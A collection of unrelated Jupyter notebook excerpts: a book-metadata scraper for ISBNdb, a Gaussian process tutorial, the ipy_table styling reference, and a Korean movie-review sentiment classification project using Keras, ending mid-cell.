def url_builder_1(book_title):
path = 'https://isbndb.com/search/books/'
title_list = book_title.split()
final_path_list=[]
for x in range(len(title_list)):
if x==len(title_list)-1:
final_path_list.append(title_list[x])
else:
final_path_list.append(title_list[x]+'%20')
return path+''.join(final_path_list)
def url_builder_2(isbn13):
path = "https://isbndb.com/book/"
return path+isbn13
def retrieve_page_content(url):
page = requests.get(url)
return page.content
def tag_visible(element):
if element.parent.name in ['style', 'script', 'head', 'title', 'meta', '[document]']:
return False
if isinstance(element, bs4.element.Comment):
return False
return True
def text_from_html(body):
soup = bs(body, 'html.parser')
texts = soup.findAll(text=True)
visible_texts = filter(tag_visible, texts)
return u" ".join(t.strip() for t in visible_texts)
def retrieve_author(book_title, product_id, html_text, index):
author='Cannot Locate'
html_text_list = html_text.split()
for x in range(len(html_text_list)):
if html_text_list[x]=='Authors:':
author=html_text_list[x+1]+' '+html_text_list[x+2]
break
author_dict = {'book_title': book_title, 'product_id': product_id, 'author': author}
author_table = pd.DataFrame(author_dict, index=[index])
return author_table
def retrieve_isbn13(book_title, product_id, html_text, index):
isbn13 = 'Cannot Locate'
html_text_list = html_text.split()
for x in range(len(html_text_list)):
if html_text_list[x]=='ISBN13:':
isbn13= html_text_list[x+1]
break
isbn13_dict = {'book_title': book_title, 'product_id':product_id, 'ISBN13':isbn13}
isbn13_table = pd.DataFrame(isbn13_dict, index=[index])
return isbn13_table
def main_author(data):
final_authors=pd.DataFrame()
counter=0
for x in range(len(data)):
try:
counter+=1
url=url_builder_1(data['product_title'][x])
html=retrieve_page_content(url)
text_html=text_from_html(html)
author = retrieve_author(data['product_title'][x], data['product_id'][x], text_html, counter)
final_authors = final_authors.append(author)
print(counter)
except:
pass
return final_authors
def retrieve_book_category(book_title, product_id, html_text, index):
book_category = 'Cannot Locate'
html_text_list = html_text.split()
for x in range(len(html_text_list)):
if html_text_list[x]=='Subjects':
book_categories = html_text_list[x+1]+', '+html_text_list[x+2]+', '+html_text_list[x+3]
break
book_categories_dict = {'book_title': book_title, 'product_id':product_id, 'book_category':book_categories}
book_categories_table = pd.DataFrame(book_categories_dict, index=[index])
return book_categories_table
def main_categories(data):
counter=0
book_categories=pd.DataFrame()
for x in range(len(data)):
try:
counter+=1
url=url_builder_1(data['product_title'][x])
html=retrieve_page_content(url)
text_html=text_from_html(html)
isbn13 = retrieve_isbn13(data['product_title'][x], data['product_id'][x], text_html, counter)
url2=url_builder_2(isbn13.iloc[0]['ISBN13'])
html2=retrieve_page_content(url2)
text_html2=text_from_html(html2)
category=retrieve_book_category(data['product_title'][x], data['product_id'][x], text_html2, counter)
book_categories = book_categories.append(category)
print(counter)
except:
pass
return book_categories
```
| github_jupyter |
```
import numpy as np
import matplotlib.pyplot as plt
%load_ext autoreload
%autoreload 2
%matplotlib inline
%config InlineBackend.figure_format = 'retina'
```
# A Fundamental Property of Gaussians
A multivariate Gaussian is nothing more than a generalization of the univariate Gaussian.
We parameterize univariate Gaussians with a $\mu$ and $\sigma$, where $\mu$ and $\sigma$ are scalars.
A bivariate Gaussian is two univariate Gaussians that may also share a relationship to one another. We can jointly model both Gaussians by modelling not just how they vary independently, but also how they vary with one another.
```
mu1 = np.array(0)
mu2 = np.array(0)
sig11 = np.array(3)
sig12 = np.array(-2)
sig21 = np.array(-2)
sig22 = np.array(4)
mean = np.array([mu1, mu2])
cov = np.array([[sig11, sig12], [sig21, sig22]])
draws = np.random.multivariate_normal(mean, cov, size=1000)
plt.scatter(*draws.T)
```
One of the fundamental properties of Gaussians is that if you have a Multivariate Gaussian (e.g. a joint distribution of 2 or more Gaussian random variables), if we condition on any subset of Gaussians, the joint distribution of the rest of the Gaussians can be found analytically. There's a formula, and it's expressed in code below.
```
x1 = 0
mu_2g1 = mu2 + sig21 * 1 / sig11 * (x1 - mu1)
sig_2g1 = sig22 - sig21 * 1 / sig11 * sig12
mu_2g1, sig_2g1
```
Go ahead and play with the slider below.
```
from ipywidgets import interact, FloatSlider, IntSlider
@interact(x1=FloatSlider(min=-4, max=4, continuous_update=False))
def plot_conditional(x1):
fig, axes = plt.subplots(nrows=1, ncols=2, figsize=(12, 6))
axes[0].scatter(*draws.T)
axes[0].vlines(x=x1, ymin=draws[:, 1].min(), ymax=draws[:, 1].max(), color='red')
axes[0].hlines(y=0, xmin=draws[:, 0].min(), xmax=draws[:, 0].max(), color='black')
# Compute Conditional
mu_2g1 = mu2 + sig21 * 1 / sig11 * (x1 - mu1)
sig_2g1 = sig22 - sig21 * 1 / sig11 * sig12
x2_draws = np.random.normal(mu_2g1, sig_2g1, size=10000)
axes[1].hist(x2_draws, bins=100, color='red')
axes[1].vlines(x=0, ymin=0, ymax=400, color='black')
axes[1].set_xlim(-10, 10)
axes[1].set_ylim(0, 400)
```
# 2D $\mu$s
Take this into higher dimensions. Let's not compare two scalar $\mu$s, but now do two $\mu$s that are each a vector of 2 dimensions.
```
mu1 = np.array([0, 0])
mu2 = np.array([0, 0])
sig11 = np.array([[1, 0], [0, 1]])
sig12 = np.array([[2, 0], [0, 2]])
sig21 = sig12.T
sig22 = np.array([[0.8, 0], [0, 0.8]])
mean = np.array([mu1, mu2])
cov = np.array([[sig11, sig12], [sig21, sig22]])
# draws = np.random.multivariate_normal(mean, cov, size=1000)
# plt.scatter(*draws.T)
cov
x1 = np.array([0, -3])
mu_2g1 = mu2 + sig21 @ np.linalg.inv(sig11) @ (x1 - mu1)
sig_2g1 = sig22 - sig21 @ np.linalg.inv(sig11) @ sig12
sig_2g1, mu_2g1
```
# Implementing GP Prior
When we use a GP, we're essentially modelling the **outputs** as being described by a joint Gaussian distribution.
We would like to be able to specify the covariance matrix as a function of the distances between the inputs - regardless of whether the inputs are 1-D, 2-D, or more. That is the key to generalizing from 1D examples to the 2D examples commonly shown.
```
import seaborn as sns
n = 50
x_train = np.linspace(-5, 5, n).reshape(-1, 1)
# sns.heatmap(x_train - x_train.T, cmap='RdBu')
def sq_exp(x1, x2):
"""
Squared exponential kernel.
Assumes that x1 and x2 have the same shape.
"""
diff = x1 - x2.T
sqdiff = np.power(diff, 2)
return np.exp(-0.5 * sqdiff)
sns.heatmap(sq_exp(x_train, x_train), cmap='RdBu')
```
Draw from prior.
```
K = sq_exp(x_train, x_train)
eps = 1E-6 * np.eye(n) #
L = np.linalg.cholesky(K + eps)
f_prior = np.dot(L, np.random.normal(size=(n, 10)))
plt.plot(x_train, f_prior)
plt.show()
def true_function_1d(x):
x = x + 1E-10
return np.sin(x)
n = 200
x_samp = np.array([2, 18, -10, 10, -12, 12, -2, 5, -13, 6, -18, 8, -8, 0, 15]).reshape(-1, 1)
f_samp = true_function_1d(x_samp)
K_samp = sq_exp(x_samp, x_samp)
eps = 1E-6 * np.eye(len(x_samp))
L_samp = np.linalg.cholesky(K_samp + eps)
x_s = np.linspace(-20, 20, n).reshape(-1, 1)
K_ss = sq_exp(x_s, x_s)
K_s = sq_exp(x_samp, x_s)
mu_cond = K_s.T @ np.linalg.inv(K_samp) @ f_samp
sig_cond = K_ss - K_s.T @ np.linalg.inv(K_samp) @ K_s
f_posterior = np.random.multivariate_normal(mu_cond.flatten(), sig_cond, size=100)
for f in f_posterior:
plt.plot(x_s, f, color='grey', alpha=0.1)
plt.scatter(x_samp, f_samp)
plt.plot(x_s, true_function_1d(x_s))
plt.plot(x_s, mu_cond.flatten())
plt.show()
sig_cond.min()
sns.heatmap(sig_cond, cmap='RdBu')
```
We can rewrite extend this code to apply in two dimensions. Let's say that our data lived on a grid, rather than on a single dimension. A periodic function is applied on a 2D grid.
```
def true_function(x1, x2):
# return np.sin(x1**2 + x2**2) / (x1**2 + x2**2)
return np.sin(x1) + np.sin(x2)
```
# Prior
Let's sample a prior from a 2D plane.
```
sq_exp??
import numpy as np
import scipy
x1 = np.array([[2, 2], [2, 1], [1, 2], [1, 1]])
def sq_exp2d(x1, x2):
d = scipy.spatial.distance.cdist(x1, x2)
return np.exp(-0.5 * np.power(d, 2))
x1 = np.linspace(-5, 5, 20)
x2 = np.linspace(-5, 5, 20)
xx1, xx2 = np.meshgrid(x1, x2, sparse=True)
z = true_function(xx1, xx2)
h = plt.contourf(x1, x2, z)
plt.gca().set_aspect('equal')
plt.title('true function')
true_function(xx1, xx2).shape
import matplotlib.pyplot as plt
from mpl_toolkits.mplot3d import Axes3D
fig = plt.figure()
ax = fig.add_subplot(111, projection='3d')
z = true_function(xx1, xx2)
ax.plot_surface(xx1, xx2, z)
ax.set_title('true function')
plt.show()
```
We'll simulate sampling 5 starting points.
```
x_samp = np.array([[0, 3], [1, 2], [1, -5], [-2, -2], [-2, 2], [2, -2], [3, 5]])
f_samp = true_function(x_samp[:, 0], x_samp[:, 1])
K_samp = sq_exp2d(x_samp, x_samp)
eps = 1E-6 * np.eye(len(x_samp))
L_samp = np.linalg.cholesky(K_samp + eps)
n = 35
x_points = np.linspace(-5, 5, n).reshape(-1, 1)
xx1, xx2 = np.meshgrid(x_points, x_points, sparse=False)
x_spts = np.vstack([xx1.flatten(), xx2.flatten()])
K_ss = sq_exp2d(x_spts.T, x_spts.T)
K_s = sq_exp2d(x_samp, x_spts.T)
mu_cond = K_s.T @ np.linalg.inv(K_samp) @ f_samp.flatten()
sig_cond = K_ss - K_s.T @ np.linalg.inv(K_samp) @ K_s
n_samps = 1000
f_posterior = np.random.multivariate_normal(mu_cond, sig_cond, size=n_samps)
# for f in f_posterior:
# plt.plot(x_s, f, color='grey', alpha=0.1)
# plt.scatter(x_samp, f_samp)
# plt.plot(x_s, true_function(x_train))
# plt.plot(x_s, mu_cond.flatten())
f_posterior.reshape(n_samps, n, n).max(axis=0)
mu_cond.shape
fig = plt.figure()
ax = fig.add_subplot(111, projection='3d')
ax.plot_surface(xx1, xx2, mu_cond.reshape(n, n))
ax.set_title('mean')
plt.show()
lower, upper = np.percentile(f_posterior.reshape(n_samps, n, n), [2.5, 97.5], axis=0)
uncertainty = upper - lower
uncertainty.shape
fig, axes = plt.subplots(nrows=1, ncols=3, figsize=(15, 5), sharex=True, sharey=True)
axes[0].contourf(xx1, xx2, uncertainty, levels=50)
axes[0].set_title('95% interval size')
axes[0].scatter(*x_samp.T, color='red')
axes[0].set_aspect('equal')
axes[0].set_ylim(-5, 5)
axes[0].set_xlim(-5, 5)
axes[1].contourf(xx1, xx2, true_function(xx1, xx2), levels=50)
axes[1].set_title('ground truth')
axes[1].scatter(*x_samp.T, color='red')
axes[1].set_aspect('equal')
axes[2].contourf(xx1, xx2, mu_cond.reshape(n, n), levels=50)
axes[2].set_title('mean')
axes[2].scatter(*x_samp.T, color='red')
axes[2].set_aspect('equal')
```
In the plot sabove, red dots mark where we have sampled points on the 2D grid.
The left plot shows the size of the 95% prediction interval at each point on the grid. We can see that we have the smallest uncertainty where we have sampled.
The middle plot shows ground truth, and the values where we have sampled data.
The right plot shows the value of the mean where we have sampled. It is evident that where we do not have better data, the function evaluations default to the mean function.
# Parting Thoughts
The key ingredient of a GP: A Kernel that can model "distance" of some kind between every pair of inputs. Thus, it isn't the number of dimensions that is limiting; it is the number of *data points that have been sampled* that is limiting! (Inversion of the matrix only depends on the data that we are conditioning on, and that is of order $O(n^3)$.)
```
x2_new, x1_new = np.where(uncertainty == uncertainty.max()) # row, then column, i.e. x2 then x1.
xx1_s, xx2_s = np.meshgrid(x_points, x_points, sparse=True)
xx1_s.flatten()[x1_new], xx2_s.flatten()[x2_new]
```
| github_jupyter |
# ipy_table Reference
The home page for ipy_table is at [epmoyer.github.com/ipy_table/](http://epmoyer.github.com/ipy_table/)
ipy_table is maintained at [github.com/epmoyer/ipy_table](https://github.com/epmoyer/ipy_table)
```
import add_parent_to_path
```
## Table Creation
To create a table call make_table on an array (a list of equal sized lists) or a ``numpy.ndarray``.
``make_table()`` creates a table in interactive mode. Subsequent calls to modify styles (e.g. ``apply_theme()``, ``set_cell_style()``, etc.) will re-render the table with the new style modifications.
```
from ipy_table import *
example_table = [[i for i in range(j,j+4)] for j in range(0,30,10)]
make_table(example_table)
```
## Built-in Styles
ipy_table implements three pre-defined table styles (basic, basic_left, and basic_both) which provide bold gray headers and alternating colored rows for three different header configurations.
```
make_table(example_table)
apply_theme('basic')
make_table(example_table)
apply_theme('basic_left')
import copy
example_table2 = copy.deepcopy(example_table) # Copy the example table
example_table2[0][0] = '' # Clear the contents of the upper left corner cell
make_table(example_table2)
apply_theme('basic_both')
```
## set_cell_style()
Sets the style of a single cell. For a list of the available style options, see **Syle Options** below.
```
make_table(example_table)
set_cell_style(1, 2, color='red')
```
## set_row_style()
Sets the style for a row of cells. For a list of the available style options, see **Syle Options** below.
```
make_table(example_table)
set_row_style(0, color='lightGreen')
```
## set_column_style()
Sets the style for a column of cells. For a list of the available style options, see **Syle Options** below.
```
make_table(example_table)
set_column_style(1, color='lightBlue')
```
## set_global_style()
Sets the style for all cells. For a list of the available style options, see **Syle Options** below.
```
make_table(example_table)
set_global_style(color='Pink')
```
## Style options
### bold
```
make_table(example_table)
set_row_style(1, bold=True)
```
### italic
```
make_table(example_table)
set_row_style(1, italic=True)
```
### color
Sets background cell color by name. The color name can be any any standard web/X11 color name. For a list see http://en.wikipedia.org/wiki/Web_colors
```
make_table(example_table)
set_row_style(1, color='Orange')
```
### thick_border
Accepts a comma delimited list of cell edges, which may be any of: left, top, right, bottom. You can also speify 'all' to include all edges.
```
make_table(example_table)
set_cell_style(0,0, thick_border='left,top')
set_cell_style(2,3, thick_border='right,bottom')
make_table(example_table)
set_row_style(1, thick_border='all')
```
### no_border
Accepts a comma delimited list of cell edges, which may be any of: left, top, right, bottom. You can also speify 'all' to include all edges.
```
make_table(example_table)
set_cell_style(0,0, no_border='left,top')
set_cell_style(2,3, no_border='right,bottom')
make_table(example_table)
set_row_style(1, no_border='all')
```
### row_span
```
make_table(example_table)
set_cell_style(0, 0, row_span=3)
```
### column_span
```
make_table(example_table)
set_cell_style(1,1, column_span=3)
```
### width
Sets the cell width in pixels.
```
make_table(example_table)
set_cell_style(0,0, width=100)
```
### align
Sets the cell alignment. Accpets any of: left, right, center.
```
make_table(example_table)
set_cell_style(0, 0, width='100')
set_cell_style(0, 0, align='right')
set_cell_style(1, 0, align='center')
```
### wrap
Turns text wrapping on or off. By default wraping is off.
```
example_table2 = copy.deepcopy(example_table)
example_table2[0][0] = 'This cell has wrap set'
example_table2[0][1] = 'This cell does not have wrap set'
make_table(example_table2)
set_cell_style(0, 0, width=50,wrap=True)
set_cell_style(0, 1, width=50)
```
### float_format
Sets the display format for floating point values.
The float format string is a standard Python "%" format string (and should contain one and only one %f reference). See http://docs.python.org/2/library/stdtypes.html#string-formatting-operations
The float format only affects cells that contain ``float`` or ``numpy.float64`` data types, so you can use set_global_style to set a global floating point format and only those cells containing floating point data will be affected.
The default float format is '%0.4f'.
```
from ipy_table import *
example_table2 = [[i + float(i)/100.0 + i/10000.0 for i in range(j,j+4)] for j in range(0,30,10)]
make_table(example_table2)
set_cell_style(0, 0, float_format='%0.1f')
set_cell_style(1, 0, float_format='%0.6f')
set_cell_style(2, 0, float_format='$%0.2f')
```
## Class interface
```
t = IpyTable(example_table)
t.set_cell_style(1, 1, color='DarkCyan')
t
```
## Interactive interface with manual render
```
make_table(example_table, interactive=False)
set_row_style(1,color='yellow')
render()
```
## HTML Text Representation
The HTML text representation of the current table can be obtained by calling ``render()._repr_html_()``
```
render()._repr_html_()
```
## Tabulate
Use ``tabulate(list, n)`` to display a list (not an array) of data in a table with n columns.
```
tabulate(range(20), 6)
```
``tabulate()`` creates a table object just like ``make_table()``, so the same style operations can be applied.
```
set_cell_style(1, 2, color='yellow')
```
## Version
```
import ipy_table as ipt
ipt.__version__
```
| github_jupyter |
# 7-11. 프로젝트 : 네이버 영화리뷰 감성분석 도전하기
이전 스텝까지는 영문 텍스트의 감정분석을 진행해 보았습니다. 그렇다면 이번에는 한국어 텍스트의 감정분석을 진행해 보면 어떨까요? 오늘 활용할 데이터셋은 네이버 영화의 댓글을 모아 구성된 Naver sentiment movie corpus입니다.
데이터 다운로드 없이 Cloud shell에서 해당 파일의 심볼릭 링크를 연결 해 주세요
### 평가기준
1. 다양한 방법으로 Text Classification 태스크를 성공적으로 구현하였다. (3가지 이상의 모델이 성공적으로 시도됨)
2. gensim을 활용하여 자체학습된 혹은 사전학습된 임베딩 레이어를 분석하였다. (gensim의 유사단어 찾기를 활용하여 자체학습한 임베딩과 사전학습 임베딩을 적절히 분석함)
3. 한국어 Word2Vec을 활용하여 가시적인 성능향상을 달성했다. (네이버 영화리뷰 데이터 감성분석 정확도를 85% 이상 달성함)
```
!pip install --upgrade gensim==3.8.3
```
### 1) 데이터 준비와 확인
```
import pandas as pd
import urllib.request
%matplotlib inline
import matplotlib.pyplot as plt
import re
from konlpy.tag import Okt
from tensorflow import keras
from tensorflow.keras.preprocessing.text import Tokenizer
import numpy as np
from tensorflow.keras.preprocessing.sequence import pad_sequences
from collections import Counter
# 데이터를 읽어봅시다.
train_data = pd.read_table('~/aiffel/sentiment_classification/data/ratings_train.txt')
test_data = pd.read_table('~/aiffel/sentiment_classification/data/ratings_test.txt')
train_data.head()
```
### 2) 데이터로더 구성
실습 때 다루었던 IMDB 데이터셋은 텍스트를 가공하여 imdb.data_loader() 메소드를 호출하면 숫자 인덱스로 변환된 텍스트와 word_to_index 딕셔너리까지 친절하게 제공합니다. 그러나 이번에 다루게 될 nsmc 데이터셋은 전혀 가공되지 않은 텍스트 파일로 이루어져 있습니다. 이것을 읽어서 imdb.data_loader()와 동일하게 동작하는 자신만의 data_loader를 만들어 보는 것으로 시작합니다. data_loader 안에서는 다음을 수행해야 합니다.
- 데이터의 중복 제거
- NaN 결측치 제거
- 한국어 토크나이저로 토큰화
- 불용어(Stopwords) 제거
- 사전word_to_index 구성
- 텍스트 스트링을 사전 인덱스 스트링으로 변환
- X_train, y_train, X_test, y_test, word_to_index 리턴
```
from konlpy.tag import Mecab
tokenizer = Mecab()
stopwords = ['의','가','이','은','들','는','좀','잘','걍','과','도','를','으로','자','에','와','한','하다']
def load_data(train_data, test_data, num_words=10000):
train_data.drop_duplicates(subset=['document'], inplace=True)
train_data = train_data.dropna(how = 'any')
test_data.drop_duplicates(subset=['document'], inplace=True)
test_data = test_data.dropna(how = 'any')
X_train = []
for sentence in train_data['document']:
temp_X = tokenizer.morphs(sentence) # 토큰화
temp_X = [word for word in temp_X if not word in stopwords] # 불용어 제거
X_train.append(temp_X)
X_test = []
for sentence in test_data['document']:
temp_X = tokenizer.morphs(sentence) # 토큰화
temp_X = [word for word in temp_X if not word in stopwords] # 불용어 제거
X_test.append(temp_X)
words = np.concatenate(X_train).tolist()
counter = Counter(words)
counter = counter.most_common(10000-4)
vocab = ['', '', '', ''] + [key for key, _ in counter]
word_to_index = {word:index for index, word in enumerate(vocab)}
def wordlist_to_indexlist(wordlist):
return [word_to_index[word] if word in word_to_index else word_to_index[''] for word in wordlist]
X_train = list(map(wordlist_to_indexlist, X_train))
X_test = list(map(wordlist_to_indexlist, X_test))
return X_train, np.array(list(train_data['label'])), X_test, np.array(list(test_data['label'])), word_to_index
X_train, y_train, X_test, y_test, word_to_index = load_data(train_data, test_data)
index_to_word = {index:word for word, index in word_to_index.items()}
# 문장 1개를 활용할 딕셔너리와 함께 주면, 단어 인덱스 리스트 벡터로 변환해 주는 함수입니다.
# 단, 모든 문장은 <BOS>로 시작하는 것으로 합니다.
def get_encoded_sentence(sentence, word_to_index):
return [word_to_index['<BOS>']]+[word_to_index[word] if word in word_to_index else word_to_index['<UNK>'] for word in sentence.split()]
# 여러 개의 문장 리스트를 한꺼번에 단어 인덱스 리스트 벡터로 encode해 주는 함수입니다.
def get_encoded_sentences(sentences, word_to_index):
return [get_encoded_sentence(sentence, word_to_index) for sentence in sentences]
# 숫자 벡터로 encode된 문장을 원래대로 decode하는 함수입니다.
def get_decoded_sentence(encoded_sentence, index_to_word):
return ' '.join(index_to_word[index] if index in index_to_word else '<UNK>' for index in encoded_sentence[1:]) #[1:]를 통해 <BOS>를 제외
# 여러 개의 숫자 벡터로 encode된 문장을 한꺼번에 원래대로 decode하는 함수입니다.
def get_decoded_sentences(encoded_sentences, index_to_word):
return [get_decoded_sentence(encoded_sentence, index_to_word) for encoded_sentence in encoded_sentences]
# encode가 정상적으로 decode 되는지 확인
print(X_train[0])
print(get_decoded_sentence(X_train[0], index_to_word))
print('라벨: ', y_train[0]) # 1번째 리뷰데이터의 라벨
```
#### 데이터셋에 PAD, BOS, UNK가 없다.
확인해 보면, 앞쪽에 있어야 할 PAD, BOS, UNK가 나타나지 않았음을 알 수 있다. 이들을 각각 index 0, 1, 2로 대응시켜 딕셔너리에 포함시킨다.
```
word_to_index
word_to_index["<PAD>"] = 0 # 패딩
word_to_index["<BOS>"] = 1 # 모든 문장의 시작
word_to_index["<UNK>"] = 2 # Unknown을 의미
index_to_word = {index:word for word, index in word_to_index.items()}
```
### 3) 모델구성을 위한 데이터 분석 및 가공
- 데이터셋 내 문장 길이 분포
- 적절한 최대 문장 길이 지정
= 문장 최대 길이 maxlen의 값 설정도 전체 모델 성능에 영향을 미치게 된다. 이 길이도 적절한 값을 찾기 위해서는 전체 데이터셋의 분포를 확인해 보는 것이 좋다.
- keras.preprocessing.sequence.pad_sequences 을 활용한 패딩 추가
```
# 데이터셋 내의 문장길이분포
print(X_train[0]) # 1번째 리뷰데이터
print('라벨: ', y_train[0]) # 1번째 리뷰데이터의 라벨
print('1번째 리뷰 문장 길이: ', len(X_train[0]))
print('2번째 리뷰 문장 길이: ', len(X_train[1]))
# 적절한 최대문장길이 지정
total_data_text = list(X_train) + list(X_test)
# 텍스트데이터 문장길이의 리스트를 생성한 후
num_tokens = [len(tokens) for tokens in total_data_text]
num_tokens = np.array(num_tokens)
# 문장길이의 평균값, 최대값, 표준편차를 계산
print('문장길이 평균 : ', np.mean(num_tokens))
print('문장길이 최대 : ', np.max(num_tokens))
print('문장길이 표준편차 : ', np.std(num_tokens))
# 예를들어, 최대 길이를 (평균 + 2*표준편차)로 한다면,
max_tokens = np.mean(num_tokens) + 2 * np.std(num_tokens)
maxlen = int(max_tokens)
print('pad_sequences maxlen : ', maxlen)
print('전체 문장의 {}%가 maxlen 설정값 이내에 포함됩니다. '.format(np.sum(num_tokens < max_tokens) / len(num_tokens)))
print('리뷰의 최대 길이 :',max(len(l) for l in X_train))
print('리뷰의 평균 길이 :',sum(map(len, X_train)) / len(X_train))
plt.hist([len(s) for s in X_train], bins=50)
plt.xlabel('length of samples')
plt.ylabel('number of samples')
plt.show()
```
##### 처음에 maxlen의 값을 높였을 때 전체 문장이 maxlen 설정값 이내에 포함되는 값이 클 수록 좋은 것이라고 생각했다.
##### 다만 문장길이가 너무 긴 이상치를 가진 데이터를 제거하고 학습하는 것이 더 효율적이라고 판단하여 maxlen을 int(평균 + 2*표준편차)로 지정하였다.
```
X_train = keras.preprocessing.sequence.pad_sequences(X_train,
value=word_to_index["<PAD>"],
padding='post',
maxlen=maxlen)
X_test = keras.preprocessing.sequence.pad_sequences(X_test,
value=word_to_index["<PAD>"],
padding='post',
maxlen=maxlen)
print(X_train.shape)
X_train[0]
# 훈련 데이터 앞쪽 50000개 까지 validation set으로 사용
X_val = X_train[:50000]
y_val = y_train[:50000]
# validation set을 제외한 나머지는 모두 훈련 데이터로 사용
partial_x_train = X_train[50000:]
partial_y_train = y_train[50000:]
print(partial_x_train.shape)
print(partial_y_train.shape)
print(X_val.shape)
print(y_val.shape)
```
### 4) 모델구성 및 validation set 구성
모델은 3가지 이상 다양하게 구성하여 실험해 보세요.
#### 1-D Conv
```
vocab_size = 10000 # 어휘 사전의 크기입니다(10개의 단어)
word_vector_dim = 16 # 단어 하나를 표현하는 임베딩 벡터의 차원 수입니다.
model = keras.Sequential()
model.add(keras.layers.Embedding(vocab_size, word_vector_dim, input_shape=(None,)))
model.add(keras.layers.Conv1D(16, 7, activation='relu'))
model.add(keras.layers.MaxPooling1D(5))
model.add(keras.layers.Conv1D(16, 7, activation='relu'))
model.add(keras.layers.GlobalMaxPooling1D())
model.add(keras.layers.Dense(8, activation='relu'))
model.add(keras.layers.Dense(1, activation='sigmoid')) # 최종 출력은 긍정/부정을 나타내는 1dim 입니다.
model.summary()
model.compile(optimizer='adam',
loss='binary_crossentropy',
metrics=['accuracy'])
epochs = 10
history = model.fit(partial_x_train,
partial_y_train,
epochs=epochs,
batch_size=512,
validation_data=(X_val, y_val),
verbose=1)
plt.figure(figsize=(12, 4))
plt.subplot(1, 2, 1)
plt.plot(history.history['loss'], marker='.', c='red', label='Train Loss')
plt.plot(history.history['val_loss'], marker='.', c='blue', label='Validation Loss')
plt.xlabel('Epoch')
plt.ylabel('Loss')
plt.legend()
plt.subplot(1, 2, 2)
plt.plot(history.history['accuracy'], 'g--', label='Train accuracy')
plt.plot(history.history['val_accuracy'], 'k--', label='Validation accuracy')
plt.xlabel('Epoch')
plt.ylabel('Accuracy')
plt.ylim(0, 1)
plt.legend()
plt.show()
# 모델 평가
results = model.evaluate(X_test, y_test, verbose=2)
print(results)
```
#### LSTM
```
from tensorflow.keras.layers import Embedding, LSTM, Dense, Bidirectional, GRU
# Optimizer를 인수로 받는 train_model() 함수
def train_model(Optimizer, X_train, y_train, X_val, y_val):
model = keras.Sequential()
model.add(Embedding(input_dim=10000, output_dim=16))
model.add(LSTM(units=128))
model.add(Dense(units=1, activation='sigmoid'))
model.compile(loss='binary_crossentropy', optimizer=Optimizer,
metrics=['accuracy'])
scores = model.fit(X_train, y_train, batch_size=512,
epochs=10,
validation_data=(X_val, y_val),
verbose=1)
return scores, model
RMSprop_score, RMSprop_model = train_model(Optimizer='RMSprop',
X_train=partial_x_train,
y_train=partial_y_train,
X_val=X_val,
y_val=y_val)
plt.figure(figsize=(12, 4))
plt.subplot(1, 2, 1)
plt.plot(RMSprop_score.history['loss'], marker='.', c='red', label='Train Loss')
plt.plot(RMSprop_score.history['val_loss'], marker='.', c='blue', label='Validation Loss')
plt.xlabel('Epoch')
plt.ylabel('Loss')
plt.legend()
plt.subplot(1, 2, 2)
plt.plot(RMSprop_score.history['accuracy'], 'g--', label='Train accuracy')
plt.plot(RMSprop_score.history['val_accuracy'], 'k--', label='Validation accuracy')
plt.xlabel('Epoch')
plt.ylabel('Accuracy')
plt.ylim(0, 1)
plt.legend()
plt.show()
# 모델 평가
results = RMSprop_model.evaluate(X_test, y_test, verbose=2)
print(results)
```
정확도를 85.10을 달성할 수 있었다.
#### Confusion Matrix
```
from sklearn.metrics import confusion_matrix
import seaborn as sns
plt.figure(figsize=(10, 7))
sns.set(font_scale=2)
y_test_pred = RMSprop_model.predict_classes(X_test)
c_matrix = confusion_matrix(y_test, y_test_pred)
ax = sns.heatmap(c_matrix, annot=True, xticklabels=['Negative Sentiment', 'Positive Sentiment'],
yticklabels=['Negative Sentiment', 'Positive Sentiment'], cbar=False, cmap='Blues', fmt='g')
ax.set_xlabel("Prediction")
ax.set_ylabel("Actual")
plt.show()
```
대부분의 예측은 맞았다. 틀린거는 negative 4568개, positive 2758개 였다.
```
false_negatives = [] # 예측은 부정. 실제로는 긍정적인 리뷰
false_positives = [] # 에측은 긍적. 실제로는 부정적인 리뷰
for i in range(len(y_test_pred)):
if y_test_pred[i][0] != y_test[i]:
if y_test[i] == 0: # FP: False Positive
false_positives.append(i)
else: # FN
false_negatives.append(i)
print(false_negatives[20])
print(false_negatives[30])
print(false_negatives[100])
# 실제로는 긍정적인 리뷰이지만 예측은 부정으로 한 케이스
string_1 = get_decoded_sentence(X_test[100], index_to_word).replace("<PAD>", "").strip()
string_2 = get_decoded_sentence(X_test[500], index_to_word).replace("<PAD>", "").strip()
string_3 = get_decoded_sentence(X_test[3000], index_to_word).replace("<PAD>", "").strip()
print(string_1)
print(string_2)
print(string_3)
print(false_positives[200])
print(false_positives[500])
print(false_positives[1500])
# 실제로는 부정적인 리뷰이지만 예측은 긍정으로 한 케이스
string_1 = get_decoded_sentence(X_test[1000], index_to_word).replace("<PAD>", "").strip()
string_2 = get_decoded_sentence(X_test[15000], index_to_word).replace("<PAD>", "").strip()
string_3 = get_decoded_sentence(X_test[30000], index_to_word).replace("<PAD>", "").strip()
print(string_1)
print(string_2)
print(string_3)
```
#### 딥러닝
```
vocab_size = 10000 # 어휘 사전의 크기입니다(10,000개의 단어)
word_vector_dim = 16 # 워드 벡터의 차원 수 (변경 가능한 하이퍼파라미터)
# model 설계 - 딥러닝 모델 코드를 직접 작성해 주세요.
model = keras.Sequential()
# [[YOUR CODE]]
model.add(keras.layers.Embedding(vocab_size, word_vector_dim, input_shape=(None,)))
model.add(keras.layers.Conv1D(16, 7, activation='relu'))
model.add(keras.layers.MaxPooling1D(5))
model.add(keras.layers.Conv1D(16, 7, activation='relu'))
model.add(keras.layers.GlobalMaxPooling1D())
model.add(keras.layers.Dense(8, activation='relu'))
model.add(keras.layers.Dense(8, activation='relu'))
model.add(keras.layers.Dense(1, activation='sigmoid')) # 최종 출력은 긍정/부정을 나타내는 1dim 입니다.
model.summary()
model.compile(optimizer='adam',
loss='binary_crossentropy',
metrics=['accuracy'])
epochs=10 # 몇 epoch를 훈련하면 좋을지 결과를 보면서 바꾸어 봅시다.
history = model.fit(partial_x_train,
partial_y_train,
epochs=epochs,
batch_size=512,
validation_data=(X_val, y_val),
verbose=1)
results = model.evaluate(X_test, y_test, verbose=2)
print(results)
history_dict = history.history
print(history_dict.keys()) # epoch에 따른 그래프를 그려볼 수 있는 항목들
acc = history_dict['accuracy']
val_acc = history_dict['val_accuracy']
loss = history_dict['loss']
val_loss = history_dict['val_loss']
epochs = range(1, len(acc) + 1)
# "bo"는 "파란색 점"입니다
plt.plot(epochs, loss, 'bo', label='Training loss')
# b는 "파란 실선"입니다
